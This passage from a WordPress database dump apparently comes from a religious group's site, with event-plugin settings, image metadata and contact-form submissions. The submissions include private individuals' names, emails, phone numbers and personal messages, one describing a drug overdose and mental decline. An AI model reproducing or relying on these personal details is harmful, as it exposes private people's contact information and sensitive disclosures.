nal-file','2023/10/tree-path-5-updraft-pre-smush-original.jpg'),(193849,269223,'_form_id','61'),(193850,269223,'_seq_num','79'),(193848,269223,'_field_649','Alberto, this is Monica Tom.  Kelly asked me to sign up this class for her.  I just wanted to let you know she did sign up for the Precept class last year but she is ill.  She really wanted to be in this class.'),(193847,269223,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(193846,269223,'_field_651','(303) 306-8880'),(193845,269223,'_field_653','kellywinfo@gmail.com'),(193844,269223,'_field_652','Walker'),(152858,266169,'protect_children',''),(152859,266169,'mec_color',''),(152860,266169,'mec_location_id','118'),(152861,266169,'mec_dont_show_map','0'),(152862,266169,'mec_organizer_id','1'),(152863,266169,'mec_read_more',''),(152864,266169,'mec_more_info',''),(152865,266169,'mec_more_info_title',''),(152866,266169,'mec_more_info_target','_self'),(152867,266169,'mec_cost',''),(152868,266169,'mec_currency','a:0:{}'),(152869,266169,'mec_additional_organizer_ids','a:0:{}'),(152870,266169,'mec_additional_location_ids','a:0:{}'),(152871,266169,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152872,266169,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152873,266169,'mec_certain_weekdays','a:0:{}'),(152874,266169,'mec_allday','0'),(152875,266169,'one_occurrence','0'),(152876,266169,'mec_hide_time','0'),(152877,266169,'mec_hide_end_time','0'),(152878,266169,'mec_comment',''),(152879,266169,'mec_timezone','global'),(152880,266169,'mec_countdown_method','global'),(152881,266169,'mec_public','1'),(152882,266169,'mec_start_date','2022-02-13'),(152883,266169,'mec_start_time_hour','10'),(152884,266169,'mec_start_time_minutes','30'),(152885,266169,'mec_start_time_ampm','AM'),(152886,266169,'mec_start_day_seconds','37800'),(152887,266169,'mec_end_date','2022-02-13'),(152888,266169,'mec_end_time_hour','11'),(152889,266169,'mec_end_time_minutes','30'),(152890,266169,'mec_end_time_ampm','PM'),(152891,266169,'mec_end_day_seconds','84600'),(152892,266169,'mec_repeat_status','0'),(152893,266169,'mec_repeat_type',''),(152894,266169,'mec_repeat_interval','1'),(152895,266169,'mec_repeat_end',''),(152896,266169,'mec_repeat_end_at_occurrences',''),(152897,266169,'mec_repeat_end_at_date',''),(152898,266169,'mec_advanced_days','a:0:{}'),(152899,266169,'mec_in_days',''),(152900,266169,'mec_not_in_days',''),(152901,266169,'mec_hourly_schedules','a:0:{}'),(152902,266169,'mec_booking','a:0:{}'),(152903,266169,'mec_tickets','a:0:{}'),(152904,266169,'mec_fees_global_inheritance','1'),(152905,266169,'mec_fees','a:0:{}'),(152906,266169,'mec_ticket_variations_global_inheritance','1'),(152907,266169,'mec_ticket_variations','a:0:{}'),(152908,266169,'mec_reg_fields_global_inheritance','1'),(152909,266169,'mec_reg_fields','a:0:{}'),(152910,266169,'mec_bfixed_fields','a:0:{}'),(152911,266169,'mec_op','a:0:{}'),(152912,266169,'mec_fields','a:0:{}'),(152913,266169,'mec_event_status','EventScheduled'),(152914,266169,'mec_moved_online_link',''),(152915,266169,'mec_cancelled_reason',''),(152916,266169,'mec_display_cancellation_reason_in_single_page',''),(152917,266169,'boldgrid_hide_page_title','0'),(152918,266169,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152919,266169,'passster_activate_global_protection',NULL),(152920,266169,'passster_activate_protection',NULL),(152921,266169,'passster_protection_type','password'),(152922,266169,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(152923,266169,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(152924,266169,'_dp_original','264605'),(152925,266169,'_edit_lock','1643662653:2'),(152926,266169,'_edit_last','2'),(152927,266169,'_thumbnail_id','266217'),(154297,247336,'_wp_old_date','2021-10-16'),(154295,247330,'_wp_old_date','2021-10-16'),(154410,266282,'_form_id','53'),(154409,266282,'_field_505','Testing'),(154408,266282,'_field_503','US'),(154406,266282,'_field_501','Denver'),(154407,266282,'_field_502','CO'),(154284,266277,'_edit_last','2'),(154405,266282,'_field_500','123 Mystreet'),(154404,266282,'_field_499','choll.03@comcast.net'),(154403,266282,'_field_498','(555) 555-5555'),(154402,266282,'_field_497','TEST'),(154401,266282,'_field_496','Test2'),(154400,266282,'protect_children',''),(154281,266277,'passster_protection_type','password'),(154282,266277,'_dp_original','70278'),(154283,266277,'_edit_lock','1645119948:2'),(154280,266277,'passster_activate_protection',NULL),(154279,266277,'passster_activate_global_protection',NULL),(154278,266277,'protect_children',''),(154277,266277,'bgseo_robots_follow','follow'),(154276,266277,'bgseo_robots_index','index'),(154275,266277,'boldgrid_in_page_containers','1'),(154274,266277,'boldgrid_hide_page_title','0'),(154273,266277,'_wpac_nonmembers_redirect_to',''),(154272,266277,'_wpac_show_excerpt_in_search','0'),(154271,266277,'_wpac_show_in_search','0'),(154270,266277,'_wpac_members_redirect_to',''),(154269,266277,'_wpac_is_members_only','true'),(154268,266277,'_wp_page_template','default'),(154267,70278,'passster_protection_type','password'),(154266,70278,'passster_activate_protection',NULL),(154265,70278,'passster_activate_global_protection',NULL),(161657,266676,'mec_hide_time','0'),(161656,266676,'one_occurrence','0'),(161655,266676,'mec_allday','0'),(161654,266676,'mec_certain_weekdays','a:0:{}'),(169063,267183,'_field_138',' A Son or a Servant\nBy Pastor Ray Stedman\n\n“For to which of the angels did God ever say, “You are my Son; today I have become your Father?” Or again, “I will be his Father, and he will be my Son?”\nHebrews 1:5\n\nThe writer of Hebrews is now comparing Jesus with the angels. The ancient world made a great deal of angels. They worshipped them in many of the ancient religious rites. Angels are the demigods of the Roman and Greek pantheon. Therefore, this letter was written to people who particularly had an interest in angels. This subject may not interest us as much today as it did then, but it is still a tremendous revelation of the person of Christ.\n\nThe Lord Jesus, says the writer, has a greater name than the angels, primarily because of his relationship. The contrast is between a Son and a servant. Angels are servants, but Christ is the Son.\n\nI once visited a ranch as the guest of the hired man on that ranch. When we came onto the property we had to drive around the big house and go to the bunkhouse in the rear. I stayed with him there in the bunkhouse and never once got into the big house with him. There were some beautiful sorrel horses in the pasture and I suggested we take a ride. He said, “Oh, no, I\'m not permitted to ride those horses.” So we had to ride some mangy fleabags out to the pasture. A few weeks later I became acquainted with the son of the household, and he invited me out to the ranch. When I went out with him, it was entirely different. We went right into the big house and he took over the place, as all teenagers do. After a sumptuous meal we went out and rode the sorrel horses all over the range. What a wonderful time we had.\n\nThat is the difference between a son and a servant, and that is the difference between Christ and any angel. He is greater because of his relationship, the fact that he is a Son. Blood is always thicker than water.\n\nAs C. S. Lewis points out, what we make with our hands is always something different than we are, but what we beget with our bodies is always the dearest thing in the world to us because it is part of us. Thus, the angels were made; the Son was begotten. What we beget has the same nature we have; what we make is always different. The angels, being made, cannot have the same relationship as the Son, who was begotten.\n\nHere is the final answer to the cults. Both Mormonism and Jehovah\'s Witnesses teach that Jesus Christ was nothing more than an angel, the highest created angel. They identify him with Michael, the Archangel. But this passage in Hebrews utterly demolishes that theory, for Christ is a Son, and not an angel. To what angel did God ever say, “Thou art my Son.”\n\nPrayer\nOur Father, the claims of the Lord Jesus are incomparable, they can never be surpassed. I pray, therefore, that I may face up to this, and realize that there is no way of working out the problems of human life except as I work them out in fellowship with him.\n\nLife Application\nDoes the Lord Jesus Christ occupy His rightful and exclusive place as God in our thoughts, words and deeds? Are we guarding against the worldly pantheon of false gods while delighting in our rich inheritance in Christ?\n\n\n'),(169062,267183,'_field_137',' A Son or a Servant'),(169061,267183,'_field_135','s.foren@verizon.net'),(193879,269228,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid'),(193878,269228,'_field_651','(719) 784-7037'),(193877,269228,'_field_653','lillianwright1815@gmail.com'),(193876,269228,'_field_652','Wright'),(194021,269256,'_form_id','61'),(194022,269256,'_seq_num','94'),(194023,269258,'_field_654','Mikael'),(194024,269258,'_field_652','Wharf'),(194025,269258,'_field_653','mikael_1147@protonmail.com'),(194026,269258,'_field_651','(719) 426-0801'),(194027,269258,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(169059,267183,'_field_133','skyan'),(169060,267183,'_field_134','foren'),(152996,266173,'_wp_attached_file','2022/01/John.webp'),(152997,266173,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:17:\"2022/01/John.webp\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"John-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"John-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:17:\"John-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:17:\"John-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:17:\"John-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:17:\"John-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"John-450x250.webp\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(153002,266173,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/01/John.webp - cannot be optimized, it has an invalid file type'),(153003,266173,'smush-complete',''),(153004,266175,'_field_133','Lincoln '),(153005,266175,'_field_134','Torres'),(153006,266175,'_field_135','soultegrity@gmail.com'),(153007,266175,'_field_137','Easy Way Discourses ECK Satsang Classes'),(153008,266175,'_field_138','Hayo! (Waves), I have recently become a new member in ECKANKAR. I have received the easy way discourses book. I would like to see if I can be enrolled into the Easy Way Discourses ECK Satsang Classes. I think I have missed a few recently, but I do see they are still continuing. If there is any way y’all could help me get me in, that would be very much appreciated. I am located in Denver, Colorado - Lincoln '),(153009,266175,'_form_id','13'),(153010,266175,'_seq_num','95'),(153012,266177,'mec_cancelled_reason',''),(153013,266177,'mec_display_cancellation_reason_in_single_page',''),(153014,266177,'boldgrid_hide_page_title','0'),(153015,266177,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153016,266177,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-30\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-30\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153017,266177,'mec_currency','a:0:{}'),(153018,266177,'mec_additional_organizer_ids','a:0:{}'),(153019,266177,'mec_additional_location_ids','a:0:{}'),(153020,266177,'mec_cost',''),(153021,266177,'mec_more_info_target','_self'),(153022,266177,'mec_more_info_title',''),(153023,266177,'mec_organizer_id','1'),(153024,266177,'mec_read_more',''),(153025,266177,'mec_more_info',''),(153026,266177,'mec_repeat_type',''),(153027,266177,'mec_repeat_status','0'),(153028,266177,'mec_end_day_seconds','50400'),(153029,266177,'mec_end_time_ampm','PM'),(153030,266177,'mec_end_time_minutes','0'),(153031,266177,'mec_end_time_hour','2'),(153032,266177,'mec_end_date','2022-01-30'),(153033,266177,'mec_start_day_seconds','46800'),(153034,266177,'mec_start_time_ampm','PM'),(153035,266177,'mec_start_time_minutes','0'),(153036,266177,'mec_public','1'),(153037,266177,'mec_start_date','2022-01-30'),(153038,266177,'mec_start_time_hour','1'),(153039,266177,'mec_countdown_method','global'),(153040,266177,'mec_timezone','global'),(153041,266177,'mec_comment',''),(153042,266177,'one_occurrence','0'),(153043,266177,'mec_hide_time','0'),(153044,266177,'mec_hide_end_time','0'),(153045,266177,'mec_event_status','EventScheduled'),(153046,266177,'mec_fields','a:0:{}'),(153047,266177,'mec_op','a:0:{}'),(153048,266177,'mec_bfixed_fields','a:0:{}'),(153049,266177,'mec_reg_fields','a:0:{}'),(153050,266177,'mec_reg_fields_global_inheritance','1'),(153051,266177,'mec_ticket_variations','a:0:{}'),(153052,266177,'mec_ticket_variations_global_inheritance','1'),(153053,266177,'mec_fees','a:0:{}'),(153054,266177,'mec_booking','a:0:{}'),(153055,266177,'mec_tickets','a:0:{}'),(153056,266177,'mec_fees_global_inheritance','1'),(153057,266177,'mec_hourly_schedules','a:0:{}'),(153058,266177,'mec_not_in_days',''),(153059,266177,'mec_in_days',''),(153060,266177,'mec_repeat_end_at_date',''),(153061,266177,'mec_advanced_days','a:0:{}'),(153062,266177,'passster_protection_type','password'),(153063,266177,'passster_activate_global_protection',NULL),(153064,266177,'passster_activate_protection',NULL),(153065,266177,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153066,266177,'mec_repeat_end_at_occurrences',''),(153067,266177,'mec_repeat_end',''),(153068,266177,'mec_repeat_interval','1'),(153069,266177,'mec_allday','0'),(153070,266177,'mec_certain_weekdays','a:0:{}'),(153071,266177,'mec_dont_show_map','0'),(153072,266177,'mec_location_id','131'),(153073,266177,'mec_color',''),(153074,266177,'protect_children',''),(153075,266177,'_dp_original','265831'),(153076,266177,'_edit_lock','1642525370:2'),(153077,266177,'_edit_last','2'),(189949,268894,'_field_138','Test................'),(153078,266179,'_wp_attached_file','2022/01/PagosaEvent.webp'),(153079,266179,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:24:\"2022/01/PagosaEvent.webp\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"PagosaEvent-450x250.webp\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(153080,266177,'_thumbnail_id','266179'),(153081,266179,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/01/PagosaEvent.webp - cannot be optimized, it has an invalid file type'),(153082,266179,'smush-complete',''),(153084,266182,'_field_133','skyan'),(153085,266182,'_field_134','foren'),(153086,266182,'_field_135','s.foren@globlex.net'),(153087,266182,'_field_137','The Suffering Savior'),(153088,266182,'_field_138','The Suffering Savior\n\nMy God, my God, why have you forsaken me?\nPsalm 22:1a\n\nIn many ways this is the most amazing of all the psalms. In it we have a picture of the crucifixion and resurrection of the Lord Jesus painted by the psalmist David one thousand years before Jesus Christ was born. It constitutes one of the most amazing predictions of all time.\n\nAt least nine specific events or aspects of the crucifixion are described here in minute detail. All of them were fulfilled during the six hours in which Jesus hung upon the cross. Moreover, the latter part of the psalm clearly depicts the resurrection of Jesus from the dead. The probability that the predictions of these nine events would be fulfilled by chance in one person, on one afternoon is inconceivably small. The chance that all this could occur by accident is beyond any realm of possibility our minds could imagine. Yet all was fulfilled as predicted in this amazing psalm.\n\nIt is common knowledge that on November 22, 1963, President John Kennedy was assassinated in Dallas, Texas, while riding down a Dallas street in a car. Suppose there had been in existence a document that predicted this event, and we knew it had been written in AD 963. That was about the time of the height of the Byzantine Empire, when most of the Western world was ruled from Constantinople, much of Europe was only sparsely inhabited by barbarian tribes, and America was not yet discovered.\n\nSuppose that a document had been prepared in that ancient day that predicted that a time would come when a man of great prominence, head of a great nation, would be riding down a street of a large city in a metal chariot not drawn by horses and would suddenly and violently die as a little piece of metal hurled from a weapon made of wood and iron penetrated his brain. This weapon would be aimed at him from the window of a tall building, and his death would have worldwide effect and cause worldwide mourning. You can imagine with what awe such a document would be viewed today. Such a prediction would be similar to what we have in Psalm 22. That hypothetical prediction would have been made even before the invention of the automobile or firearms and five hundred years before the discovery of America. It would be regarded as fantastically accurate. Yet we have that very sort of thing in this psalm.\n\nThe psalm has two major divisions. The first twenty-one verses recount for us the torments of an unknown sufferer who is entirely alone and is crying out to God in His agony. Many scholars assert that these first twenty-one verses represent the thoughts that went through the mind of the Savior as He hung upon the cross and suffered there. From verse twenty-two to the end the sufferer is no longer alone but is in the midst of a large company and is praising God and shouting in victory. It ends with His claiming the worship of the entire world.\n\nPrayer\nLord Jesus, it is unfathomable to me what You endured on the cross. Thank You for Your willingness to suffer and die. I worship you as my Savior and Lord. (1)\n\nLife Application\nWhen Jesus became sin for us He endured unthinkable separation from the Father fulfilling amazing prophecy. What implication does that have for us today?\n\nNote:\n(1)  Hebrews 1:6 says:  Angels worship Jesus\n                   Psalm 148:2 says:  Angels worship God\n\n\n                  Acts 4:12 says:  Jesus is the One Savior\n                   Isaiah 45:21 says:  The One Savior is God\n\n'),(153089,266182,'_form_id','13'),(153090,266182,'_seq_num','96'),(153091,266183,'_field_133','Dezi'),(153092,266183,'_field_134','Lopez'),(153093,266183,'_field_135','callmeflyman@gmail.com'),(153094,266183,'_field_137','Lost'),(153095,266183,'_field_138','I need help. Almost 3 years ago I had a near death experience coupled with (overdose of psychedelics) and found myself overloaded with knowledge and concepts I hadnt ever heard/dreamed of....\n\n\nAt this point it seems I have deteriorated and cant even do basic mundane things anymore when before I was interested in how to Astral/Soul Project and help others in community.... I no longer can stand on my own as ive tried to do....\n\n\nWhen I sang the HU.... I never really felt closer to God.... And that hurt and I want to know why I cannot.....\n\n\nPlease help or advise.... \n\n-Dezi'),(153096,266183,'_form_id','13'),(153097,266183,'_seq_num','97'),(153098,266185,'protect_children',''),(153099,266185,'mec_color',''),(153100,266185,'mec_location_id','118'),(153101,266185,'mec_dont_show_map','0'),(153102,266185,'mec_organizer_id','1'),(153103,266185,'mec_read_more',''),(153104,266185,'mec_more_info',''),(153105,266185,'mec_more_info_title',''),(153106,266185,'mec_more_info_target','_self'),(153107,266185,'mec_cost',''),(153108,266185,'mec_currency','a:0:{}'),(153109,266185,'mec_additional_organizer_ids','a:0:{}'),(153110,266185,'mec_additional_location_ids','a:0:{}'),(153111,266185,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153112,266185,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153113,266185,'mec_certain_weekdays','a:0:{}'),(153114,266185,'mec_allday','0'),(153115,266185,'one_occurrence','0'),(153116,266185,'mec_hide_time','0'),(153117,266185,'mec_hide_end_time','0'),(153118,266185,'mec_comment',''),(153119,266185,'mec_timezone','global'),(153120,266185,'mec_countdown_method','global'),(153121,266185,'mec_public','1'),(153122,266185,'mec_start_date','2022-02-11'),(153123,266185,'mec_start_time_hour','7'),(153124,266185,'mec_start_time_minutes','0'),(153125,266185,'mec_start_time_ampm','PM'),(153126,266185,'mec_start_day_seconds','68400'),(153127,266185,'mec_end_date','2022-02-11'),(153128,266185,'mec_end_time_hour','8'),(153129,266185,'mec_end_time_minutes','0'),(153130,266185,'mec_end_time_ampm','PM'),(153131,266185,'mec_end_day_seconds','72000'),(153132,266185,'mec_repeat_status','0'),(153133,266185,'mec_repeat_type',''),(153134,266185,'mec_repeat_interval','1'),(153135,266185,'mec_repeat_end',''),(153136,266185,'mec_repeat_end_at_occurrences',''),(153137,266185,'mec_repeat_end_at_date',''),(153138,266185,'mec_advanced_days','a:0:{}'),(153139,266185,'mec_in_days',''),(153140,266185,'mec_not_in_days',''),(153141,266185,'mec_hourly_schedules','a:0:{}'),(153142,266185,'mec_booking','a:0:{}'),(153143,266185,'mec_tickets','a:0:{}'),(153144,266185,'mec_fees_global_inheritance','1'),(153145,266185,'mec_fees','a:0:{}'),(153146,266185,'mec_ticket_variations_global_inheritance','1'),(153147,266185,'mec_ticket_variations','a:0:{}'),(153148,266185,'mec_reg_fields_global_inheritance','1'),(153149,266185,'mec_reg_fields','a:0:{}'),(153150,266185,'mec_bfixed_fields','a:0:{}'),(153151,266185,'mec_op','a:0:{}'),(153152,266185,'mec_fields','a:0:{}'),(153153,266185,'mec_event_status','EventScheduled'),(153154,266185,'mec_moved_online_link',''),(153155,266185,'mec_cancelled_reason',''),(153156,266185,'mec_display_cancellation_reason_in_single_page',''),(153157,266185,'boldgrid_hide_page_title','0'),(153158,266185,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 